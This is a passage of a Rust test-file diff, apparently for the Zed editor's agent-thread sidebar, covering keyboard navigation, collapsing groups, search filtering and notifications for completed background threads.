Some(Utc::now()), + archived: false, + }, + icon: IconName::ZedAgent, + icon_from_external_svg: None, + status: AgentThreadStatus::Completed, + workspace: ThreadEntryWorkspace::Open(workspace.clone()), + is_live: false, + is_background: false, + is_title_generating: false, + highlight_positions: Vec::new(), + worktrees: Vec::new(), + diff_stats: DiffStats::default(), + }), + // Active thread with Running status + ListEntry::Thread(ThreadEntry { + metadata: ThreadMetadata { + session_id: acp::SessionId::new(Arc::from("t-2")), + agent_id: AgentId::new("zed-agent"), + folder_paths: PathList::default(), + main_worktree_paths: PathList::default(), + title: "Running thread".into(), + updated_at: Utc::now(), + created_at: Some(Utc::now()), + archived: false, + }, + icon: IconName::ZedAgent, + icon_from_external_svg: None, + status: AgentThreadStatus::Running, + workspace: ThreadEntryWorkspace::Open(workspace.clone()), + is_live: true, + is_background: false, + is_title_generating: false, + highlight_positions: Vec::new(), + worktrees: Vec::new(), + diff_stats: DiffStats::default(), + }), + // Active thread with Error status + ListEntry::Thread(ThreadEntry { + metadata: ThreadMetadata { + session_id: acp::SessionId::new(Arc::from("t-3")), + agent_id: AgentId::new("zed-agent"), + folder_paths: PathList::default(), + main_worktree_paths: PathList::default(), + title: "Error thread".into(), + updated_at: Utc::now(), + created_at: Some(Utc::now()), + archived: false, + }, + icon: IconName::ZedAgent, + icon_from_external_svg: None, + status: AgentThreadStatus::Error, + workspace: ThreadEntryWorkspace::Open(workspace.clone()), + is_live: true, + is_background: false, + is_title_generating: false, + highlight_positions: Vec::new(), + worktrees: Vec::new(), + diff_stats: DiffStats::default(), + }), + // Thread with WaitingForConfirmation status, not active + ListEntry::Thread(ThreadEntry { + metadata: ThreadMetadata { + session_id: acp::SessionId::new(Arc::from("t-4")), + agent_id: AgentId::new("zed-agent"), + folder_paths: PathList::default(), + main_worktree_paths: PathList::default(), + title: "Waiting thread".into(), + updated_at: Utc::now(), + created_at: Some(Utc::now()), + archived: false, + }, + icon: IconName::ZedAgent, + icon_from_external_svg: None, + status: AgentThreadStatus::WaitingForConfirmation, + workspace: ThreadEntryWorkspace::Open(workspace.clone()), + is_live: false, + is_background: false, + is_title_generating: false, + highlight_positions: Vec::new(), + worktrees: Vec::new(), + diff_stats: DiffStats::default(), + }), + // Background thread that completed (should show notification) + ListEntry::Thread(ThreadEntry { + metadata: ThreadMetadata { + session_id: acp::SessionId::new(Arc::from("t-5")), + agent_id: AgentId::new("zed-agent"), + folder_paths: PathList::default(), + main_worktree_paths: PathList::default(), + title: "Notified thread".into(), + updated_at: Utc::now(), + created_at: Some(Utc::now()), + archived: false, + }, + icon: IconName::ZedAgent, + icon_from_external_svg: None, + status: AgentThreadStatus::Completed, + workspace: ThreadEntryWorkspace::Open(workspace.clone()), + is_live: true, + is_background: true, + is_title_generating: false, + highlight_positions: Vec::new(), + worktrees: Vec::new(), + diff_stats: DiffStats::default(), + }), + // View More entry + ListEntry::ViewMore { + key: project::ProjectGroupKey::new(None, expanded_path.clone()), + is_fully_expanded: false, + }, + // Collapsed project header + ListEntry::ProjectHeader { + key: project::ProjectGroupKey::new(None, collapsed_path.clone()), + label: "collapsed-project".into(), + highlight_positions: Vec::new(), + has_running_threads: false, + waiting_thread_count: 0, + is_active: false, + }, + ]; + + // Select the Running thread (index 2) + s.selection = Some(2); + }); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [expanded-project]", + " Completed thread", + " Running thread * (running) <== selected", + " Error thread * (error)", + " Waiting thread (waiting)", + " Notified thread * (!)", + " + View More", + "> [collapsed-project]", + ] + ); + + // Move selection to the collapsed header + sidebar.update_in(cx, |s, _window, _cx| { + s.selection = Some(7); + }); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx).last().cloned(), + Some("> [collapsed-project] <== selected".to_string()), + ); + + // Clear selection + sidebar.update_in(cx, |s, _window, _cx| { + s.selection = None; + }); + + // No entry should have the selected marker + let entries = visible_entries_as_strings(&sidebar, cx); + for entry in &entries { + assert!( + !entry.contains("<== selected"), + "unexpected selection marker in: {}", + entry + ); + } +} + +#[gpui::test] +async fn test_keyboard_select_next_and_previous(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_n_test_threads(3, &project, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Entries: [header, thread3, thread2, thread1] + // Focusing the sidebar does not set a selection; select_next/select_previous + // handle None gracefully by starting from the first or last entry. + focus_sidebar(&sidebar, cx); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), None); + + // First SelectNext from None starts at index 0 + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(0)); + + // Move down through remaining entries + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(1)); + + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(2)); + + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(3)); + + // At the end, wraps back to first entry + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(0)); + + // Navigate back to the end + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(1)); + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(2)); + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(3)); + + // Move back up + cx.dispatch_action(SelectPrevious); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(2)); + + cx.dispatch_action(SelectPrevious); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(1)); + + cx.dispatch_action(SelectPrevious); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(0)); + + // At the top, selection clears (focus returns to editor) + cx.dispatch_action(SelectPrevious); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), None); +} + +#[gpui::test] +async fn test_keyboard_select_first_and_last(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_n_test_threads(3, &project, cx).await; + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + focus_sidebar(&sidebar, cx); + + // SelectLast jumps to the end + cx.dispatch_action(SelectLast); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(3)); + + // SelectFirst jumps to the beginning + cx.dispatch_action(SelectFirst); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(0)); +} + +#[gpui::test] +async fn test_keyboard_focus_in_does_not_set_selection(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // Initially no selection + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), None); + + // Open the sidebar so it's rendered, then focus it to trigger focus_in. + // focus_in no longer sets a default selection. + focus_sidebar(&sidebar, cx); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), None); + + // Manually set a selection, blur, then refocus — selection should be preserved + sidebar.update_in(cx, |sidebar, _window, _cx| { + sidebar.selection = Some(0); + }); + + cx.update(|window, _cx| { + window.blur(); + }); + cx.run_until_parked(); + + sidebar.update_in(cx, |_, window, cx| { + cx.focus_self(window); + }); + cx.run_until_parked(); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(0)); +} + +#[gpui::test] +async fn test_keyboard_confirm_on_project_header_toggles_collapse(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_n_test_threads(1, &project, cx).await; + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Thread 1"] + ); + + // Focus the sidebar and select the header (index 0) + focus_sidebar(&sidebar, cx); + sidebar.update_in(cx, |sidebar, _window, _cx| { + sidebar.selection = Some(0); + }); + + // Confirm on project header collapses the group + cx.dispatch_action(Confirm); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["> [my-project] <== selected"] + ); + + // Confirm again expands the group + cx.dispatch_action(Confirm); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project] <== selected", " Thread 1",] + ); +} + +#[gpui::test] +async fn test_keyboard_confirm_on_view_more_expands(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_n_test_threads(8, &project, cx).await; + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Should show header + 5 threads + "View More" + let entries = visible_entries_as_strings(&sidebar, cx); + assert_eq!(entries.len(), 7); + assert!(entries.iter().any(|e| e.contains("View More"))); + + // Focus sidebar (selection starts at None), then navigate down to the "View More" entry (index 6) + focus_sidebar(&sidebar, cx); + for _ in 0..7 { + cx.dispatch_action(SelectNext); + } + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(6)); + + // Confirm on "View More" to expand + cx.dispatch_action(Confirm); + cx.run_until_parked(); + + // All 8 threads should now be visible with a "Collapse" button + let entries = visible_entries_as_strings(&sidebar, cx); + assert_eq!(entries.len(), 10); // header + 8 threads + Collapse button + assert!(!entries.iter().any(|e| e.contains("View More"))); + assert!(entries.iter().any(|e| e.contains("Collapse"))); +} + +#[gpui::test] +async fn test_keyboard_expand_and_collapse_selected_entry(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_n_test_threads(1, &project, cx).await; + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Thread 1"] + ); + + // Focus sidebar and manually select the header (index 0). Press left to collapse. + focus_sidebar(&sidebar, cx); + sidebar.update_in(cx, |sidebar, _window, _cx| { + sidebar.selection = Some(0); + }); + + cx.dispatch_action(SelectParent); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["> [my-project] <== selected"] + ); + + // Press right to expand + cx.dispatch_action(SelectChild); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project] <== selected", " Thread 1",] + ); + + // Press right again on already-expanded header moves selection down + cx.dispatch_action(SelectChild); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(1)); +} + +#[gpui::test] +async fn test_keyboard_collapse_from_child_selects_parent(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_n_test_threads(1, &project, cx).await; + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Focus sidebar (selection starts at None), then navigate down to the thread (child) + focus_sidebar(&sidebar, cx); + cx.dispatch_action(SelectNext); + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(1)); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Thread 1 <== selected",] + ); + + // Pressing left on a child collapses the parent group and selects it + cx.dispatch_action(SelectParent); + cx.run_until_parked(); + + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(0)); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["> [my-project] <== selected"] + ); +} + +#[gpui::test] +async fn test_keyboard_navigation_on_empty_list(cx: &mut TestAppContext) { + let project = init_test_project("/empty-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // An empty project has the header and a new thread button. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [empty-project]", " [+ New Thread]"] + ); + + // Focus sidebar — focus_in does not set a selection + focus_sidebar(&sidebar, cx); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), None); + + // First SelectNext from None starts at index 0 (header) + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(0)); + + // SelectNext moves to the new thread button + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(1)); + + // At the end, wraps back to first entry + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(0)); + + // SelectPrevious from first entry clears selection (returns to editor) + cx.dispatch_action(SelectPrevious); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), None); +} + +#[gpui::test] +async fn test_selection_clamps_after_entry_removal(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_n_test_threads(1, &project, cx).await; + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Focus sidebar (selection starts at None), navigate down to the thread (index 1) + focus_sidebar(&sidebar, cx); + cx.dispatch_action(SelectNext); + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(1)); + + // Collapse the group, which removes the thread from the list + cx.dispatch_action(SelectParent); + cx.run_until_parked(); + + // Selection should be clamped to the last valid index (0 = header) + let selection = sidebar.read_with(cx, |s, _| s.selection); + let entry_count = sidebar.read_with(cx, |s, _| s.contents.entries.len()); + assert!( + selection.unwrap_or(0) < entry_count, + "selection {} should be within bounds (entries: {})", + selection.unwrap_or(0), + entry_count, + ); +} + +async fn init_test_project_with_agent_panel( + worktree_path: &str, + cx: &mut TestAppContext, +) -> Entity { + agent_ui::test_support::init_test(cx); + cx.update(|cx| { + cx.update_flags(false, vec!["agent-v2".into()]); + ThreadStore::init_global(cx); + ThreadMetadataStore::init_global(cx); + language_model::LanguageModelRegistry::test(cx); + prompt_store::init(cx); + }); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(worktree_path, serde_json::json!({ "src": {} })) + .await; + cx.update(|cx| ::set_global(fs.clone(), cx)); + project::Project::test(fs, [worktree_path.as_ref()], cx).await +} + +fn add_agent_panel( + workspace: &Entity, + cx: &mut gpui::VisualTestContext, +) -> Entity { + workspace.update_in(cx, |workspace, window, cx| { + let panel = cx.new(|cx| AgentPanel::test_new(workspace, window, cx)); + workspace.add_panel(panel.clone(), window, cx); + panel + }) +} + +fn setup_sidebar_with_agent_panel( + multi_workspace: &Entity, + cx: &mut gpui::VisualTestContext, +) -> (Entity, Entity) { + let sidebar = setup_sidebar(multi_workspace, cx); + let workspace = multi_workspace.read_with(cx, |mw, _cx| mw.workspace().clone()); + let panel = add_agent_panel(&workspace, cx); + (sidebar, panel) +} + +#[gpui::test] +async fn test_parallel_threads_shown_with_live_status(cx: &mut TestAppContext) { + let project = init_test_project_with_agent_panel("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let (sidebar, panel) = setup_sidebar_with_agent_panel(&multi_workspace, cx); + + // Open thread A and keep it generating. + let connection = StubAgentConnection::new(); + open_thread_with_connection(&panel, connection.clone(), cx); + send_message(&panel, cx); + + let session_id_a = active_session_id(&panel, cx); + save_test_thread_metadata(&session_id_a, &project, cx).await; + + cx.update(|_, cx| { + connection.send_update( + session_id_a.clone(), + acp::SessionUpdate::AgentMessageChunk(acp::ContentChunk::new("working...".into())), + cx, + ); + }); + cx.run_until_parked(); + + // Open thread B (idle, default response) — thread A goes to background. + connection.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Done".into()), + )]); + open_thread_with_connection(&panel, connection, cx); + send_message(&panel, cx); + + let session_id_b = active_session_id(&panel, cx); + save_test_thread_metadata(&session_id_b, &project, cx).await; + + cx.run_until_parked(); + + let mut entries = visible_entries_as_strings(&sidebar, cx); + entries[1..].sort(); + assert_eq!( + entries, + vec!["v [my-project]", " Hello *", " Hello * (running)",] + ); +} + +#[gpui::test] +async fn test_background_thread_completion_triggers_notification(cx: &mut TestAppContext) { + let project_a = init_test_project_with_agent_panel("/project-a", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a.clone(), window, cx)); + let (sidebar, panel_a) = setup_sidebar_with_agent_panel(&multi_workspace, cx); + + // Open thread on workspace A and keep it generating. + let connection_a = StubAgentConnection::new(); + open_thread_with_connection(&panel_a, connection_a.clone(), cx); + send_message(&panel_a, cx); + + let session_id_a = active_session_id(&panel_a, cx); + save_test_thread_metadata(&session_id_a, &project_a, cx).await; + + cx.update(|_, cx| { + connection_a.send_update( + session_id_a.clone(), + acp::SessionUpdate::AgentMessageChunk(acp::ContentChunk::new("chunk".into())), + cx, + ); + }); + cx.run_until_parked(); + + // Add a second workspace and activate it (making workspace A the background). + let fs = cx.update(|_, cx| ::global(cx)); + let project_b = project::Project::test(fs, [], cx).await; + multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_b, window, cx); + }); + cx.run_until_parked(); + + // Thread A is still running; no notification yet. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project-a]", " Hello * (running)",] + ); + + // Complete thread A's turn (transition Running → Completed). + connection_a.end_turn(session_id_a.clone(), acp::StopReason::EndTurn); + cx.run_until_parked(); + + // The completed background thread shows a notification indicator. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project-a]", " Hello * (!)",] + ); +} + +fn type_in_search(sidebar: &Entity, query: &str, cx: &mut gpui::VisualTestContext) { + sidebar.update_in(cx, |sidebar, window, cx| { + window.focus(&sidebar.filter_editor.focus_handle(cx), cx); + sidebar.filter_editor.update(cx, |editor, cx| { + editor.set_text(query, window, cx); + }); + }); + cx.run_until_parked(); +} + +#[gpui::test] +async fn test_search_narrows_visible_threads_to_matches(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + for (id, title, hour) in [ + ("t-1", "Fix crash in project panel", 3), + ("t-2", "Add inline diff view", 2), + ("t-3", "Refactor settings module", 1), + ] { + save_thread_metadata( + acp::SessionId::new(Arc::from(id)), + title.into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, hour, 0, 0).unwrap(), + None, + &project, + cx, + ); + } + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [my-project]", + " Fix crash in project panel", + " Add inline diff view", + " Refactor settings module", + ] + ); + + // User types "diff" in the search box — only the matching thread remains, + // with its workspace header preserved for context. + type_in_search(&sidebar, "diff", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Add inline diff view <== selected",] + ); + + // User changes query to something with no matches — list is empty. + type_in_search(&sidebar, "nonexistent", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + Vec::::new() + ); +} + +#[gpui::test] +async fn test_search_matches_regardless_of_case(cx: &mut TestAppContext) { + // Scenario: A user remembers a thread title but not the exact casing. + // Search should match case-insensitively so they can still find it. + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_thread_metadata( + acp::SessionId::new(Arc::from("thread-1")), + "Fix Crash In Project Panel".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + cx.run_until_parked(); + + // Lowercase query matches mixed-case title. + type_in_search(&sidebar, "fix crash", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [my-project]", + " Fix Crash In Project Panel <== selected", + ] + ); + + // Uppercase query also matches the same title. + type_in_search(&sidebar, "FIX CRASH", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [my-project]", + " Fix Crash In Project Panel <== selected", + ] + ); +} + +#[gpui::test] +async fn test_escape_clears_search_and_restores_full_list(cx: &mut TestAppContext) { + // Scenario: A user searches, finds what they need, then presses Escape + // to dismiss the filter and see the full list again. + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + for (id, title, hour) in [("t-1", "Alpha thread", 2), ("t-2", "Beta thread", 1)] { + save_thread_metadata( + acp::SessionId::new(Arc::from(id)), + title.into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, hour, 0, 0).unwrap(), + None, + &project, + cx, + ) + } + cx.run_until_parked(); + + // Confirm the full list is showing. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Alpha thread", " Beta thread",] + ); + + // User types a search query to filter down. + focus_sidebar(&sidebar, cx); + type_in_search(&sidebar, "alpha", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Alpha thread <== selected",] + ); + + // User presses Escape — filter clears, full list is restored. + // The selection index (1) now points at the first thread entry. + cx.dispatch_action(Cancel); + cx.run_until_parked(); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [my-project]", + " Alpha thread <== selected", + " Beta thread", + ] + ); +} + +#[gpui::test] +async fn test_search_only_shows_workspace_headers_with_matches(cx: &mut TestAppContext) { + let project_a = init_test_project("/project-a", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + for (id, title, hour) in [ + ("a1", "Fix bug in sidebar", 2), + ("a2", "Add tests for editor", 1), + ] { + save_thread_metadata( + acp::SessionId::new(Arc::from(id)), + title.into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, hour, 0, 0).unwrap(), + None, + &project_a, + cx, + ) + } + + // Add a second workspace. + multi_workspace.update_in(cx, |mw, window, cx| { + mw.create_test_workspace(window, cx).detach(); + }); + cx.run_until_parked(); + + let project_b = multi_workspace.read_with(cx, |mw, cx| { + mw.workspaces().nth(1).unwrap().read(cx).project().clone() + }); + + for (id, title, hour) in [ + ("b1", "Refactor sidebar layout", 3), + ("b2", "Fix typo in README", 1), + ] { + save_thread_metadata( + acp::SessionId::new(Arc::from(id)), + title.into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, hour, 0, 0).unwrap(), + None, + &project_b, + cx, + ) + } + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [project-a]", + " Fix bug in sidebar", + " Add tests for editor", + ] + ); + + // "sidebar" matches a thread in each workspace — both headers stay visible. + type_in_search(&sidebar, "sidebar", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project-a]", " Fix bug in sidebar <== selected",] + ); + + // "typo" only matches in the second workspace — the first header disappears. + type_in_search(&sidebar, "typo", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + Vec::::new() + ); + + // "project-a" matches the first workspace name — the header appears + // with all child threads included. + type_in_search(&sidebar, "project-a", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [project-a]", + " Fix bug in sidebar <== selected", + " Add tests for editor", + ] + ); +} + +#[gpui::test] +async fn test_search_matches_workspace_name(cx: &mut TestAppContext) { + let project_a = init_test_project("/alpha-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + for (id, title, hour) in [ + ("a1", "Fix bug in sidebar", 2), + ("a2", "Add tests for editor", 1), + ] { + save_thread_metadata( + acp::SessionId::new(Arc::from(id)), + title.into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, hour, 0, 0).unwrap(), + None, + &project_a, + cx, + ) + } + + // Add a second workspace. + multi_workspace.update_in(cx, |mw, window, cx| { + mw.create_test_workspace(window, cx).detach(); + }); + cx.run_until_parked(); + + let project_b = multi_workspace.read_with(cx, |mw, cx| { + mw.workspaces().nth(1).unwrap().read(cx).project().clone() + }); + + for (id, title, hour) in [ + ("b1", "Refactor sidebar layout", 3), + ("b2", "Fix typo in README", 1), + ] { + save_thread_metadata( + acp::SessionId::new(Arc::from(id)), + title.into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, hour, 0, 0).unwrap(), + None, + &project_b, + cx, + ) + } + cx.run_until_parked(); + + // "alpha" matches the workspace name "alpha-project" but no thread titles. + // The workspace header should appear with all child threads included. + type_in_search(&sidebar, "alpha", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [alpha-project]", + " Fix bug in sidebar <== selected", + " Add tests for editor", + ] + ); + + // "sidebar" matches thread titles in both workspaces but not workspace names. + // Both headers appear with their matching threads. + type_in_search(&sidebar, "sidebar", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [alpha-project]", " Fix bug in sidebar <== selected",] + ); + + // "alpha sidebar" matches the workspace name "alpha-project" (fuzzy: a-l-p-h-a-s-i-d-e-b-a-r + // doesn't match) — but does not match either workspace name or any thread. + // Actually let's test something simpler: a query that matches both a workspace + // name AND some threads in that workspace. Matching threads should still appear. + type_in_search(&sidebar, "fix", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [alpha-project]", " Fix bug in sidebar <== selected",] + ); + + // A query that matches a workspace name AND a thread in that same workspace. + // Both the header (highlighted) and all child threads should appear. + type_in_search(&sidebar, "alpha", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [alpha-project]", + " Fix bug in sidebar <== selected", + " Add tests for editor", + ] + ); + + // Now search for something that matches only a workspace name when there + // are also threads with matching titles — the non-matching workspace's + // threads should still appear if their titles match. + type_in_search(&sidebar, "alp", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [alpha-project]", + " Fix bug in sidebar <== selected", + " Add tests for editor", + ] + ); +} + +#[gpui::test] +async fn test_search_finds_threads_hidden_behind_view_more(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // Create 8 threads. The oldest one has a unique name and will be + // behind View More (only 5 shown by default). + for i in 0..8u32 { + let title = if i == 0 { + "Hidden gem thread".to_string() + } else { + format!("Thread {}", i + 1) + }; + save_thread_metadata( + acp::SessionId::new(Arc::from(format!("thread-{}", i))), + title.into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, i).unwrap(), + None, + &project, + cx, + ) + } + cx.run_until_parked(); + + // Confirm the thread is not visible and View More is shown. + let entries = visible_entries_as_strings(&sidebar, cx); + assert!( + entries.iter().any(|e| e.contains("View More")), + "should have View More button" + ); + assert!( + !entries.iter().any(|e| e.contains("Hidden gem")), + "Hidden gem should be behind View More" + ); + + // User searches for the hidden thread — it appears, and View More is gone. + type_in_search(&sidebar, "hidden gem", cx); + let filtered = visible_entries_as_strings(&sidebar, cx); + assert_eq!( + filtered, + vec!["v [my-project]", " Hidden gem thread <== selected",] + ); + assert!( + !filtered.iter().any(|e| e.contains("View More")), + "View More should not appear when filtering" + ); +} + +#[gpui::test] +async fn test_search_finds_threads_inside_collapsed_groups(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_thread_metadata( + acp::SessionId::new(Arc::from("thread-1")), + "Important thread".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + cx.run_until_parked(); + + // User focuses the sidebar and collapses the group using keyboard: + // manually select the header, then press SelectParent to collapse. + focus_sidebar(&sidebar, cx); + sidebar.update_in(cx, |sidebar, _window, _cx| { + sidebar.selection = Some(0); + }); + cx.dispatch_action(SelectParent); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["> [my-project] <== selected"] + ); + + // User types a search — the thread appears even though its group is collapsed. + type_in_search(&sidebar, "important", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["> [my-project]", " Important thread <== selected",] + ); +} + +#[gpui::test] +async fn test_search_then_keyboard_navigate_and_confirm(cx: &mut TestAppContext) { + let project = 